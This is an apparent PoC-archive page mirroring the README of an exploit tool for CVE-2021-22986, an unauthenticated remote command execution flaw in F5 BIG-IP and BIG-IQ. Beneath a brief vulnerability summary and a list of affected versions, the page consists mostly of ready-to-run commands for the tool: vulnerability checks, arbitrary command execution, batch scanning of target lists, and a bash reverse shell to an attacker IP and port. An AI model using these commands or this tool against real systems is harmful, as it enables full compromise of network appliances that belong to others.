目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%

CVE-2021-22986 PoC — F5 BIG-IP 代码问题漏洞

来源
关联漏洞
标题:F5 BIG-IP 代码问题漏洞 (CVE-2021-22986)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在安全漏洞,该漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。
介绍
## CVE-2021-22986

This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise. The BIG-IP system in Appliance mode is also vulnerable.

### Vuln Product

F5 BIG-IQ 6.0.0-6.1.0
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 16.0.0-16.0.1


### Usage

```
python3 CVE_2021_22986.py
```

### Finding Vulnerability
```
python3 CVE_2021_22986.py -v true -u https://192.168.174.164
```

### Command Execution
```
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
```

### Executing Command with whoami
```
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
```

### Batch Scan
```
python3 CVE_2021_22986.py -s true -f check.txt
```

### Reverse Shell
```
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
```

### New PoC
```
python3 newpoc.py https://192.168.174.164
```

### References:-

* https://support.f5.com/csp/article/K03009991

* https://github.com/safesword/F5_RCE

* https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

* https://github.com/Udyz/CVE-2021-22986-SSRF2RCE
文件快照

[4.0K] /data/pocs/a8d56e48805b214f0a316a436a701e35cfea1b6b ├── [5.6K] cve-2021-22986.py ├── [2.5M] f5.rest.jar ├── [3.5K] new-poc.py └── [1.6K] README.md 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。